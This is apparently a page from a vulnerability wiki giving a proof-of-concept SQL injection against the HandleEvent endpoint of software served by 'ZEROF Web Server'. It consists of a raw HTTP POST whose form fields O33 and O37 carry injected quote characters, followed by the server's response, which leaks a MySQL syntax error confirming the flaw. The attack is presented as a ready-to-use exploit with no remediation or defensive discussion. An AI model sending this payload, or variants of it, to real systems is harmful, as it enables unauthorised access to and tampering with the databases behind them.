pwnwiki.com
,
EXP
POST /HandleEvent HTTP/1.1 Host: zerof User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: */* Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 126 Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 07 Apr 2021 10:33:44 GMT
Server: ZEROF Web Server
try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
